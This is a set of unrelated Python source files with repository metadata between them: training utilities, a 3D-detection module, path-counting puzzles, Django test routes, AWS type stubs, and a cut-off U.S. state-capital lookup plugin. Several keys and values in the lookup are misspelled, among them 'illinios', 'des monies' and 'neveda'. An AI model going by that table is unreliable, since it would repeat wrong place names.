# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging.config
import os
import random
import sys
import time
from contextlib import contextmanager
import dllogger
import numpy as np
import torch
import torch.distributed as dist
import torch.nn.init as init
import torch.utils.collect_env
def init_lstm_(lstm, init_weight=0.1):
"""
Initializes weights of LSTM layer.
Weights and biases are initialized with uniform(-init_weight, init_weight)
distribution.
:param lstm: instance of torch.nn.LSTM
:param init_weight: range for the uniform initializer
"""
# Initialize hidden-hidden weights
init.uniform_(lstm.weight_hh_l0.data, -init_weight, init_weight)
# Initialize input-hidden weights:
init.uniform_(lstm.weight_ih_l0.data, -init_weight, init_weight)
# Initialize bias. PyTorch LSTM has two biases, one for input-hidden GEMM
# and the other for hidden-hidden GEMM. Here input-hidden bias is
# initialized with uniform distribution and hidden-hidden bias is
# initialized with zeros.
init.uniform_(lstm.bias_ih_l0.data, -init_weight, init_weight)
init.zeros_(lstm.bias_hh_l0.data)
if lstm.bidirectional:
init.uniform_(lstm.weight_hh_l0_reverse.data, -init_weight, init_weight)
init.uniform_(lstm.weight_ih_l0_reverse.data, -init_weight, init_weight)
init.uniform_(lstm.bias_ih_l0_reverse.data, -init_weight, init_weight)
init.zeros_(lstm.bias_hh_l0_reverse.data)
def generate_seeds(rng, size):
"""
Generate list of random seeds
:param rng: random number generator
:param size: length of the returned list
"""
seeds = [rng.randint(0, 2**32 - 1) for _ in range(size)]
return seeds
def broadcast_seeds(seeds, device):
"""
Broadcasts random seeds to all distributed workers.
Returns list of random seeds (broadcasted from workers with rank 0).
:param seeds: list of seeds (integers)
:param device: torch.device
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
seeds_tensor = torch.tensor(seeds, dtype=torch.int64, device=device)
torch.distributed.broadcast(seeds_tensor, 0)
seeds = seeds_tensor.tolist()
return seeds
def setup_seeds(master_seed, epochs, device):
"""
Generates seeds from one master_seed.
Function returns (worker_seeds, shuffling_seeds), worker_seeds are later
used to initialize per-worker random number generators (mostly for
dropouts), shuffling_seeds are for RNGs resposible for reshuffling the
dataset before each epoch.
Seeds are generated on worker with rank 0 and broadcasted to all other
workers.
:param master_seed: master RNG seed used to initialize other generators
:param epochs: number of epochs
:param device: torch.device (used for distributed.broadcast)
"""
if master_seed is None:
# random master seed, random.SystemRandom() uses /dev/urandom on Unix
master_seed = random.SystemRandom().randint(0, 2**32 - 1)
if get_rank() == 0:
# master seed is reported only from rank=0 worker, it's to avoid
# confusion, seeds from rank=0 are later broadcasted to other
# workers
logging.info(f'Using random master seed: {master_seed}')
else:
# master seed was specified from command line
logging.info(f'Using master seed from command line: {master_seed}')
# initialize seeding RNG
seeding_rng = random.Random(master_seed)
# generate worker seeds, one seed for every distributed worker
worker_seeds = generate_seeds(seeding_rng, get_world_size())
# generate seeds for data shuffling, one seed for every epoch
shuffling_seeds = generate_seeds(seeding_rng, epochs)
# broadcast seeds from rank=0 to other workers
worker_seeds = broadcast_seeds(worker_seeds, device)
shuffling_seeds = broadcast_seeds(shuffling_seeds, device)
return worker_seeds, shuffling_seeds
def barrier():
"""
Call torch.distributed.barrier() if distritubed is in use, else calls
torch.cuda.synchronize() if CUDA is initialized.
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
torch.distributed.barrier()
elif torch.cuda.is_available() and torch.cuda.is_initialized():
torch.cuda.synchronize()
def get_rank():
"""
Gets distributed rank or returns zero if distributed is not initialized.
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
rank = torch.distributed.get_rank()
else:
rank = 0
return rank
def get_world_size():
"""
Gets total number of distributed workers or returns one if distributed is
not initialized.
"""
if torch.distributed.is_available() and torch.distributed.is_initialized():
world_size = torch.distributed.get_world_size()
else:
world_size = 1
return world_size
@contextmanager
def sync_workers():
"""
Yields distributed rank and synchronizes all workers on exit.
"""
rank = get_rank()
yield rank
barrier()
@contextmanager
def timer(name, ndigits=2, sync_gpu=True):
if sync_gpu:
torch.cuda.synchronize()
start = time.time()
yield
if sync_gpu:
torch.cuda.synchronize()
stop = time.time()
elapsed = round(stop - start, ndigits)
logging.info(f'TIMER {name} {elapsed}')
def setup_logging(log_all_ranks=True, log_file=os.devnull):
"""
Configures logging.
By default logs from all workers are printed to the console, entries are
prefixed with "N: " where N is the rank of the worker. Logs printed to the
console don't include timestaps.
Full logs with timestamps are saved to the log_file file.
"""
class RankFilter(logging.Filter):
def __init__(self, rank, log_all_ranks):
self.rank = rank
self.log_all_ranks = log_all_ranks
def filter(self, record):
record.rank = self.rank
if self.log_all_ranks:
return True
else:
return (self.rank == 0)
rank = get_rank()
rank_filter = RankFilter(rank, log_all_ranks)
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
handler.close()
logging_format = "%(asctime)s - %(levelname)s - %(rank)s - %(message)s"
logging.basicConfig(level=logging.DEBUG,
format=logging_format,
datefmt="%Y-%m-%d %H:%M:%S",
filename=log_file,
filemode='w')
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(rank)s: %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
logging.getLogger('').addFilter(rank_filter)
def setup_dllogger(enabled=True, filename=os.devnull):
rank = get_rank()
if enabled and rank == 0:
backends = [
dllogger.JSONStreamBackend(
dllogger.Verbosity.VERBOSE,
filename,
),
]
dllogger.init(backends)
else:
dllogger.init([])
dllogger.metadata("test_bleu", {"unit": None})
dllogger.metadata("eval_90%_latency", {"unit": "ms"})
dllogger.metadata("eval_avg_latency", {"unit": "ms"})
dllogger.metadata("train_elapsed", {"unit": "s"})
dllogger.metadata("eval_throughput", {"unit": "tokens/s"})
dllogger.metadata("train_throughput", {"unit": "tokens/s"})
def set_device(cuda, local_rank):
"""
Sets device based on local_rank and returns instance of torch.device.
:param cuda: if True: use cuda
:param local_rank: local rank of the worker
"""
if cuda:
torch.cuda.set_device(local_rank)
device = torch.device('cuda')
else:
device = torch.device('cpu')
return device
def init_distributed(cuda):
"""
Initializes distributed backend.
:param cuda: (bool) if True initializes nccl backend, if False initializes
gloo backend
"""
world_size = int(os.environ.get('WORLD_SIZE', 1))
distributed = (world_size > 1)
if distributed:
backend = 'nccl' if cuda else 'gloo'
dist.init_process_group(backend=backend,
init_method='env://')
assert dist.is_initialized()
return distributed
def log_env_info():
"""
Prints information about execution environment.
"""
logging.info('Collecting environment information...')
env_info = torch.utils.collect_env.get_pretty_env_info()
logging.info(f'{env_info}')
def pad_vocabulary(math):
if math == 'tf32' or math == 'fp16' or math == 'manual_fp16':
pad_vocab = 8
elif math == 'fp32':
pad_vocab = 1
return pad_vocab
def benchmark(test_acc, target_acc, test_perf, target_perf):
def test(achieved, target, name):
passed = True
if target is not None and achieved is not None:
logging.info(f'{name} achieved: {achieved:.2f} '
f'target: {target:.2f}')
if achieved >= target:
logging.info(f'{name} test passed')
else:
logging.info(f'{name} test failed')
passed = False
return passed
passed = True
passed &= test(test_acc, target_acc, 'Accuracy')
passed &= test(test_perf, target_perf, 'Performance')
return passed
def debug_tensor(tensor, name):
"""
Simple utility which helps with debugging.
Takes a tensor and outputs: min, max, avg, std, number of NaNs, number of
INFs.
:param tensor: torch tensor
:param name: name of the tensor (only for logging)
"""
logging.info(name)
tensor = tensor.detach().float().cpu().numpy()
logging.info(f'MIN: {tensor.min()} MAX: {tensor.max()} '
f'AVG: {tensor.mean()} STD: {tensor.std()} '
f'NAN: {np.isnan(tensor).sum()} INF: {np.isinf(tensor).sum()}')
class AverageMeter:
"""
Computes and stores the average and current value
"""
def __init__(self, warmup=0, keep=False):
self.reset()
self.warmup = warmup
self.keep = keep
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
self.iters = 0
self.vals = []
def update(self, val, n=1):
self.iters += 1
self.val = val
if self.iters > self.warmup:
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
if self.keep:
self.vals.append(val)
def reduce(self, op):
"""
Reduces average value over all workers.
:param op: 'sum' or 'mean', reduction operator
"""
if op not in ('sum', 'mean'):
raise NotImplementedError
distributed = (get_world_size() > 1)
if distributed:
backend = dist.get_backend()
cuda = (backend == dist.Backend.NCCL)
if cuda:
avg = torch.cuda.FloatTensor([self.avg])
_sum = torch.cuda.FloatTensor([self.sum])
else:
avg = torch.FloatTensor([self.avg])
_sum = torch.FloatTensor([self.sum])
dist.all_reduce(avg)
dist.all_reduce(_sum)
self.avg = avg.item()
self.sum = _sum.item()
if op == 'mean':
self.avg /= get_world_size()
self.sum /= get_world_size()
|
ea1c3055ae685a9f3caab6d8a0f506afaea2c320
|
d4412fbe37540e2c4cbe59ed6503d3661ccb7d9c
|
/colossalai/utils/data_sampler/__init__.py
|
12798a94c2d063bb120f805967e748c5a1059a3a
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
hpcaitech/ColossalAI
|
a082ed08a3807b53c49d1f86835b9808590d9042
|
c7b60f75470f067d1342705708810a660eabd684
|
refs/heads/main
| 2023-09-01T04:13:13.834565
| 2023-08-30T15:07:21
| 2023-08-30T15:07:21
| 422,274,596
| 32,044
| 4,084
|
Apache-2.0
| 2023-09-14T15:19:54
| 2021-10-28T16:19:44
|
Python
|
UTF-8
|
Python
| false
| false
| 177
|
py
|
__init__.py
|
from .base_sampler import BaseSampler
from .data_parallel_sampler import DataParallelSampler, get_dataloader
__all__ = ['BaseSampler', 'DataParallelSampler', 'get_dataloader']
|
83683a98a0ab97ab3cacaefe57cd9760f4634c27
|
ebd9c249d446d809abc9a0f3e4593f34922a1b93
|
/other/unique_paths_with_followups.py
|
5e3ba18db3720c83e3cb6bef3183a71194544db4
|
[] |
no_license
|
jaychsu/algorithm
|
ac7a9dc7366f58c635a68bc46bf1640d2f5ff16d
|
91892fd64281d96b8a9d5c0d57b938c314ae71be
|
refs/heads/master
| 2023-05-11T00:40:39.237813
| 2022-09-14T07:43:12
| 2022-09-14T07:43:12
| 106,277,156
| 143
| 39
| null | 2022-09-14T07:43:13
| 2017-10-09T11:51:48
|
Python
|
UTF-8
|
Python
| false
| false
| 6,792
|
py
|
unique_paths_with_followups.py
|
"""
给定一个矩形的宽和长,求所有可能的路径数量
Rules:
1. 从左上角走到右上角
2. 要求每一步只能向正右、右上或右下走,即 →↗↘
followup1: 优化空间复杂度至 O(n)
followup2: 给定矩形里的三个点,判断是否存在遍历这三个点的路经
followup3: 给定矩形里的三个点,找到遍历这三个点的所有路径数量
followup4: 给定一个下界 (x == H),找到能经过给定下界的所有路径数量 (x >= H)
followup5: 起点和终点改成从左上到左下,每一步只能 ↓↘↙,求所有可能的路径数量
"""
def find_unique_paths(m, n):
"""
:type m: int
:type n: int
:rtype: int
>>> gotcha = [
... find_unique_paths(*_in) == _out
... for _in, _out in (
... ((2, 2), 1), ((2, 3), 2), ((3, 3), 2),
... ((5, 5), 9), ((7, 6), 21), ((6, 7), 51),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
for y in range(1, n):
for x in range(m):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
return dp[0][n - 1]
def find_unique_paths1(m, n):
"""
:type m: int
:type n: int
:rtype: int
>>> gotcha = [
... find_unique_paths1(*_in) == _out
... for _in, _out in (
... ((2, 2), 1), ((2, 3), 2), ((3, 3), 2),
... ((5, 5), 9), ((7, 6), 21), ((6, 7), 51),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [0] * m
dp[0] = 1
pre = cur = 0
for y in range(1, n):
pre = cur = 0
for x in range(m):
pre, cur = cur, dp[x]
if x > 0:
dp[x] += pre
if x + 1 < m:
dp[x] += dp[x + 1]
return dp[0]
def find_unique_paths2(m, n, points):
"""
:type m: int
:type n: int
:type points: list[list[int]]
:rtype: bool
>>> gotcha = [
... find_unique_paths2(*_in) == _out
... for _in, _out in (
... ((2, 3, [[1, 0], [1, 1], [1, 2]]), False),
... ((3, 3, [[1, 0], [2, 1], [1, 2]]), False),
... ((3, 3, [[1, 0], [1, 1], [1, 2]]), False),
... ((5, 5, [[0, 1], [2, 2], [1, 3]]), False),
... ((5, 5, [[1, 1], [2, 2], [1, 3]]), True),
... ((5, 5, [[2, 2], [1, 1], [1, 3]]), True),
... ((6, 8, [[0, 0], [4, 3], [0, 7]]), False),
... ((8, 6, [[1, 1], [0, 4], [1, 3]]), True),
... ((8, 6, [[1, 1], [0, 4], [2, 3]]), False),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n or not points or len(points) < 3:
return False
path = [(0, 0), (0, n - 1)]
path.extend(tuple(p) for p in points)
path.sort(key=lambda p: (p[1], p[0]))
for i in range(1, len(path)):
x, y = path[i]
_x, _y = path[i - 1]
delta = y - _y
if not (x - delta <= _x <= x + delta):
return False
return True
def find_unique_paths3(m, n, points):
"""
:type m: int
:type n: int
:type points: list[list[int]]
:rtype: int
>>> gotcha = [
... find_unique_paths3(*_in) == _out
... for _in, _out in (
... ((2, 3, [[1, 0], [1, 1], [1, 2]]), 0),
... ((3, 3, [[1, 0], [2, 1], [1, 2]]), 0),
... ((3, 3, [[1, 0], [1, 1], [1, 2]]), 0),
... ((5, 5, [[0, 1], [2, 2], [1, 3]]), 0),
... ((5, 5, [[1, 1], [2, 2], [1, 3]]), 1),
... ((5, 5, [[2, 2], [1, 1], [1, 3]]), 1),
... ((6, 8, [[0, 0], [4, 3], [0, 7]]), 0),
... ((8, 6, [[0, 0], [0, 5], [0, 4]]), 9),
... ((8, 6, [[1, 1], [0, 4], [2, 3]]), 0),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
NOT_FOUND = 0
if not m or not n or not points:
return NOT_FOUND
points.sort(key=lambda p: (p[1], p[0]))
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
k = len(points)
i = 0
while points[i][1] == 0:
i += 1
if i >= k:
return NOT_FOUND
for y in range(1, n):
for x in range(m):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
if i < k and y == points[i][1]:
for x in range(m):
if x != points[i][0]:
dp[x][y] = 0
i += 1
return dp[0][n - 1] if i == k else NOT_FOUND
def find_unique_paths4(m, n, h):
"""
:type m: int
:type n: int
:type h: int
:rtype: int
>>> gotcha = [
... find_unique_paths4(*_in) == _out
... for _in, _out in (
... ((2, 3, 1), 1), ((3, 3, 1), 1), ((3, 3, 2), 0),
... ((4, 4, 0), 4), ((4, 4, 1), 3), ((4, 4, 2), 0),
... ((6, 7, 0), 51), ((6, 7, 1), 50), ((6, 7, 2), 19),
... ((6, 7, 3), 1), ((6, 7, 4), 0), ((6, 7, 5), 0)
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
for y in range(1, n):
for x in range(m):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
if h < 1:
return dp[0][n - 1]
for y in range(n):
for x in range(h):
dp[x][y] = 0
for y in range(1, n):
for x in range(h - 1, -1, -1):
dp[x][y] = dp[x][y - 1]
if x > 0:
dp[x][y] += dp[x - 1][y - 1]
if x + 1 < m:
dp[x][y] += dp[x + 1][y - 1]
return dp[0][n - 1]
def find_unique_paths5(m, n):
"""
:type m: int
:type n: int
:rtype: int
>>> gotcha = [
... find_unique_paths5(*_in) == _out
... for _in, _out in (
... ((2, 2), 1), ((2, 3), 1), ((3, 3), 2),
... ((5, 5), 9), ((7, 6), 51), ((6, 7), 21),
... )
... ]
>>> bool(gotcha) and all(gotcha)
True
"""
if not m or not n:
return 0
dp = [[0] * n for _ in range(m)]
dp[0][0] = 1
for x in range(1, m):
for y in range(n):
dp[x][y] = dp[x - 1][y]
if y > 0:
dp[x][y] += dp[x - 1][y - 1]
if y + 1 < n:
dp[x][y] += dp[x - 1][y + 1]
return dp[m - 1][0]
|
810a158324610dbdd5d4925cd7214433f042ad64
|
e9aabf2d3c117f37230d89bc4516b984074a1e81
|
/mmdet3d/models/necks/feature_transformation.py
|
0eab64fbe62aa00433dbb1f39c28120e28f74f4d
|
[
"Apache-2.0"
] |
permissive
|
Tai-Wang/Depth-from-Motion
|
d0934396e588700f6cf8fd1a2c11f6a5d5d0b428
|
e2321189f923564788d59a627129fc10a9db191b
|
refs/heads/main
| 2023-05-24T01:34:35.666074
| 2022-10-11T11:52:03
| 2022-10-11T11:52:03
| 516,021,516
| 278
| 25
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,914
|
py
|
feature_transformation.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data
from mmcv.cnn import ConvModule
from mmcv.runner import BaseModule
from mmdet.models.builder import NECKS
@NECKS.register_module()
class FrustumToVoxel(BaseModule):
def __init__(
self,
num_3dconvs=1, # num of 3d conv layers before hourglass
cv_channels=32, # cost volume channels
out_channels=32, # out volume channels after conv/pool
in_sem_channels=32,
sem_atten_feat=True,
stereo_atten_feat=False,
cat_img_feature=True,
norm_cfg=dict(type='GN', num_groups=32,
requires_grad=True) # use GN by default
):
super(FrustumToVoxel, self).__init__()
# general config
self.GN = True # TODO: replace it with norm_cfg
# volume config
self.num_3dconvs = num_3dconvs
self.cv_channels = cv_channels
self.out_channels = out_channels
self.in_sem_channels = in_sem_channels
# aggregate features args
self.sem_atten_feat = sem_atten_feat
self.stereo_atten_feat = stereo_atten_feat
self.cat_img_feature = cat_img_feature
# conv layers for voxel feature volume (after grid sampling)
voxel_channels = self.cv_channels
if getattr(self, 'cat_img_feature', False):
if self.cat_img_feature:
voxel_channels += self.in_sem_channels
else:
self.cat_img_feature = False
voxel_convs = []
for i in range(self.num_3dconvs):
voxel_convs.append(
nn.Sequential(
ConvModule(
voxel_channels if i == 0 else self.out_channels,
self.out_channels,
kernel_size=3,
stride=1,
padding=1,
conv_cfg=dict(type='Conv3d'),
norm_cfg=norm_cfg)))
self.voxel_convs = nn.Sequential(*voxel_convs)
self.voxel_pool = nn.AvgPool3d((4, 1, 1), stride=(4, 1, 1))
self.init_weights()
def forward(self,
stereo_feat,
stereo_feat_softmax,
img_metas,
cur_sem_feats=None):
cam2imgs = torch.as_tensor(
[img_meta['cam2img'] for img_meta in img_metas],
dtype=torch.float32,
device=stereo_feat.device)
batch_size = len(img_metas)
# stereo_feat as the root of voxel_feat sampling
# stereo_feat_softmax as the attention mask for lifting 2D sem_feat
# to 3D space
# 1. convert plane-sweep into 3d volume
coordinates_3d = self.coordinates_3d.cuda()
norm_coord_imgs = []
coord_imgs = []
valids2d = []
for i in range(batch_size):
c3d = coordinates_3d.view(-1, 3)
# in pseudo lidar coord
c3d = project_pseudo_lidar_to_rectcam(c3d)
# coord_img = project_rect_to_image(
# c3d, cam2imgs[i].float().cuda())
coord_img = project_rect_to_image(c3d,
cam2imgs[i][:3].float().cuda())
coord_img = torch.cat([coord_img, c3d[..., 2:]], dim=-1)
coord_img = coord_img.view(*self.coordinates_3d.shape[:3], 3)
coord_imgs.append(coord_img)
# TODO: to modify for bs>1
pad_shape = img_metas[0]['pad_shape']
valid_mask_2d = (coord_img[..., 0] >= 0) & (coord_img[
..., 0] <= pad_shape[1]) & (coord_img[..., 1] >= 0) & (
coord_img[..., 1] <= pad_shape[0])
valids2d.append(valid_mask_2d)
# TODO: check whether the shape is right here
crop_x1, crop_x2 = 0, pad_shape[1]
crop_y1, crop_y2 = 0, pad_shape[0]
norm_coord_img = (coord_img - torch.as_tensor(
[crop_x1, crop_y1, self.depth_cfg['depth_min']],
device=coord_img.device)) / torch.as_tensor(
[
crop_x2 - 1 - crop_x1, crop_y2 - 1 - crop_y1,
self.depth_cfg['depth_max'] -
self.depth_cfg['depth_min']
],
device=coord_img.device)
norm_coord_img = norm_coord_img * 2. - 1.
norm_coord_imgs.append(norm_coord_img)
norm_coord_imgs = torch.stack(norm_coord_imgs, dim=0)
coord_imgs = torch.stack(coord_imgs, dim=0)
valids2d = torch.stack(valids2d, dim=0)
valids = valids2d & (norm_coord_imgs[..., 2] >= -1.) & (
norm_coord_imgs[..., 2] <= 1.)
valids = valids.float()
# 2. Retrieve Voxel Feature from Cost Volume Feature
Voxel = F.grid_sample(stereo_feat, norm_coord_imgs, align_corners=True)
Voxel = Voxel * valids[:, None, :, :, :]
if (self.stereo_atten_feat
or (self.sem_atten_feat and self.cat_img_feature)):
pred_disp = F.grid_sample(
stereo_feat_softmax.detach(),
norm_coord_imgs,
align_corners=True)
pred_disp = pred_disp * valids[:, None, :, :, :]
if self.stereo_atten_feat:
Voxel = Voxel * pred_disp
# 3. Retrieve Voxel Feature from 2D Img Feature
if self.cat_img_feature:
norm_coord_imgs_2d = norm_coord_imgs.clone().detach()
norm_coord_imgs_2d[..., 2] = 0
Voxel_2D = F.grid_sample(
cur_sem_feats.unsqueeze(2),
norm_coord_imgs_2d,
align_corners=True)
Voxel_2D = Voxel_2D * valids2d.float()[:, None, :, :, :]
if self.sem_atten_feat:
Voxel_2D = Voxel_2D * pred_disp
if Voxel is not None:
Voxel = torch.cat([Voxel, Voxel_2D], dim=1)
else:
Voxel = Voxel_2D
# (1, 64, 20, 304, 288)
Voxel = self.voxel_convs(Voxel)
# volume_features_nopool = Voxel
# (1, 32, 20, 304, 288)
Voxel = self.voxel_pool(
Voxel) # [B, C, Nz, Ny, Nx] in cam (not img frustum) view
# (1, 32, 5, 304, 288)
volume_features = Voxel
return volume_features
def project_pseudo_lidar_to_rectcam(pts_3d):
xs, ys, zs = pts_3d[..., 0], pts_3d[..., 1], pts_3d[..., 2]
return torch.stack([-ys, -zs, xs], dim=-1)
def project_rect_to_image(pts_3d_rect, P):
n = pts_3d_rect.shape[0]
ones = torch.ones((n, 1), device=pts_3d_rect.device)
pts_3d_rect = torch.cat([pts_3d_rect, ones], dim=1)
pts_2d = torch.mm(pts_3d_rect, torch.transpose(P, 0, 1)) # nx3
pts_2d[:, 0] /= pts_2d[:, 2]
pts_2d[:, 1] /= pts_2d[:, 2]
return pts_2d[:, 0:2]
|
e85447f15f3aaa3644c2e18f875272be1a4b4748
|
4e582ab5fe95a22f87a66d6857c67c73f5bc9ea6
|
/tests/urls.py
|
bd2d5487277d6f2338415d792e332c4328d750bc
|
[
"MIT"
] |
permissive
|
yezyilomo/django-restql
|
678de8df1e49841c36362824f4c16f14a60f9945
|
a232d51bcaa51e8d70da1b35b051c3da1211dfb2
|
refs/heads/master
| 2023-07-04T16:50:25.459718
| 2022-11-02T19:28:53
| 2022-11-02T19:28:53
| 179,890,697
| 645
| 52
|
MIT
| 2022-11-02T19:28:54
| 2019-04-06T21:53:41
|
Python
|
UTF-8
|
Python
| false
| false
| 2,699
|
py
|
urls.py
|
"""test_app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
try:
# For django <= 3.x
from django.conf.urls import include, url as path
except ImportError:
from django.urls import include, path
from tests.testapp import views
from rest_framework import routers
router = routers.DefaultRouter()
router.register('books', views.BookViewSet, 'book')
router.register('courses', views.CourseViewSet, 'course')
router.register('courses-with-disable-dynamic-fields', views.CourseWithDisableDaynamicFieldsKwargViewSet, 'course_with_disable_dynamic_fields_kwarg')
router.register('courses-with-returnpk-kwarg', views.CourseWithReturnPkkwargViewSet, 'course_with_returnpk_kwarg')
router.register('courses-with-field-kwarg', views.CourseWithFieldsKwargViewSet, 'course_with_field_kwarg')
router.register('courses-with-exclude-kwarg', views.CourseWithExcludeKwargViewSet, 'course_with_exclude_kwarg')
router.register('courses-with-aliased-books', views.CourseWithAliasedBooksViewSet, 'course_with_aliased_books')
router.register('course-with-dynamic-serializer-method-field', views.CourseWithDynamicSerializerMethodFieldViewSet, 'course_with_dynamic_serializer_method_field')
router.register('students', views.StudentViewSet, 'student')
router.register('students-eager-loading', views.StudentEagerLoadingViewSet, 'student_eager_loading')
router.register('students-eager-loading-prefetch', views.StudentEagerLoadingPrefetchObjectViewSet, 'student_eager_loading_prefetch')
router.register('students-auto-apply-eager-loading', views.StudentAutoApplyEagerLoadingViewSet, 'student_auto_apply_eager_loading')
router.register('writable-courses', views.WritableCourseViewSet, 'wcourse')
router.register('replaceable-students', views.ReplaceableStudentViewSet, 'rstudent')
router.register('replaceable-students-with-alias', views.ReplaceableStudentWithAliasViewSet, 'rstudent_with_alias')
router.register('writable-students', views.WritableStudentViewSet, 'wstudent')
router.register('writable-students-with-alias', views.WritableStudentWithAliasViewSet, 'wstudent_with_alias')
urlpatterns = [
path('', include(router.urls))
]
|
0ec7d4e7e8d2b9fcfba77c0e68ee6ec18ed20578
|
e03bce53de6f88c0e09f56e4fe11c36af0f1161f
|
/typings/awacs/ram.pyi
|
0035a06c97f8d5fc6330a678866324efaaaab802
|
[
"Apache-2.0"
] |
permissive
|
onicagroup/runway
|
20c31df9cbc1a1ffc5c9aa468ce5cf7d6ac7899f
|
0763b06aee07d2cf3f037a49ca0cb81a048c5deb
|
refs/heads/master
| 2023-08-30T22:35:54.113981
| 2023-08-29T14:13:35
| 2023-08-29T14:13:35
| 122,529,924
| 156
| 79
|
Apache-2.0
| 2023-09-13T13:43:50
| 2018-02-22T20:12:55
|
Python
|
UTF-8
|
Python
| false
| false
| 1,637
|
pyi
|
ram.pyi
|
"""
This type stub file was generated by pyright.
"""
from .aws import Action as BaseAction
from .aws import BaseARN
service_name = "AWS Resource Access Manager"
prefix = "ram"
class Action(BaseAction):
def __init__(self, action=...) -> None: ...
class ARN(BaseARN):
def __init__(self, resource=..., region=..., account=...) -> None: ...
AcceptResourceShareInvitation = Action("AcceptResourceShareInvitation")
AssociateResourceShare = Action("AssociateResourceShare")
AssociateResourceSharePermission = Action("AssociateResourceSharePermission")
CreateResourceShare = Action("CreateResourceShare")
DeleteResourceShare = Action("DeleteResourceShare")
DisassociateResourceShare = Action("DisassociateResourceShare")
DisassociateResourceSharePermission = Action("DisassociateResourceSharePermission")
EnableSharingWithAwsOrganization = Action("EnableSharingWithAwsOrganization")
GetPermission = Action("GetPermission")
GetResourcePolicies = Action("GetResourcePolicies")
GetResourceShareAssociations = Action("GetResourceShareAssociations")
GetResourceShareInvitations = Action("GetResourceShareInvitations")
GetResourceShares = Action("GetResourceShares")
ListPendingInvitationResources = Action("ListPendingInvitationResources")
ListPermissions = Action("ListPermissions")
ListPrincipals = Action("ListPrincipals")
ListResourceSharePermissions = Action("ListResourceSharePermissions")
ListResources = Action("ListResources")
RejectResourceShareInvitation = Action("RejectResourceShareInvitation")
TagResource = Action("TagResource")
UntagResource = Action("UntagResource")
UpdateResourceShare = Action("UpdateResourceShare")
|
e897c4e1cc8f833f5804774d8b5d1a7fa26d9214
|
c64fb4456932789dffd87eb6d07c8a43003ae987
|
/jarviscli/plugins/stateinfo.py
|
f2924b0772482a29e97fc9d9c586f18658d4654a
|
[
"MIT"
] |
permissive
|
sukeesh/Jarvis
|
9fb7fc14ebefa27203ebf9af005e236a0a32a292
|
369a0e00b8a6fbd1132657cf2da39220ce84207e
|
refs/heads/master
| 2023-08-09T12:25:38.009222
| 2023-07-02T20:17:48
| 2023-07-02T20:17:48
| 84,604,734
| 3,172
| 1,398
|
MIT
| 2023-09-13T16:37:44
| 2017-03-10T22:09:14
|
Python
|
UTF-8
|
Python
| false
| false
| 4,462
|
py
|
stateinfo.py
|
from plugin import plugin, alias
@alias("state capital", "state abbreviation")
@plugin("stateinfo")
class stateinfo:
"""
Get the postal abbreviation and state capital of a given U.S. state
Usage: stateinfo [command]
Aliases: state
state capital
state abbreviation
"""
def __call__(self, jarvis, s):
capital_dict = {
'alabama': 'montgomery',
'alaska': 'juneau',
'arizona': 'phoenix',
'arkansas': 'little rock',
'california': 'sacramento',
'colorado': 'denver',
'connecticut': 'hartford',
'delaware': 'dover',
'florida': 'tallahassee',
'georgia': 'atlanta',
'hawaii': 'honolulu',
'idaho': 'boise',
'illinios': 'springfield',
'indiana': 'indianapolis',
'iowa': 'des monies',
'kansas': 'topeka',
'kentucky': 'frankfort',
'louisiana': 'baton rouge',
'maine': 'augusta',
'maryland': 'annapolis',
'massachusetts': 'boston',
'michigan': 'lansing',
'minnesota': 'st. paul',
'mississippi': 'jackson',
'missouri': 'jefferson city',
'montana': 'helena',
'nebraska': 'lincoln',
'neveda': 'carson city',
'new hampshire': 'concord',
'new jersey': 'trenton',
'new mexico': 'santa fe',
'new york': 'albany',
'north carolina': 'raleigh',
'north dakota': 'bismarck',
'ohio': 'columbus',
'oklahoma': 'oklahoma city',
'oregon': 'salem',
'pennsylvania': 'harrisburg',
'rhoda island': 'providence',
'south carolina': 'columbia',
'south dakoda': 'pierre',
'tennessee': 'nashville',
'texas': 'austin',
'utah': 'salt lake city',
'vermont': 'montpelier',
'virginia': 'richmond',
'washington': 'olympia',
'west virginia': 'charleston',
'wisconsin': 'madison',
'wyoming': 'cheyenne'
}
abbrev_dict = {
'alabama': 'al',
'alaska': 'ak',
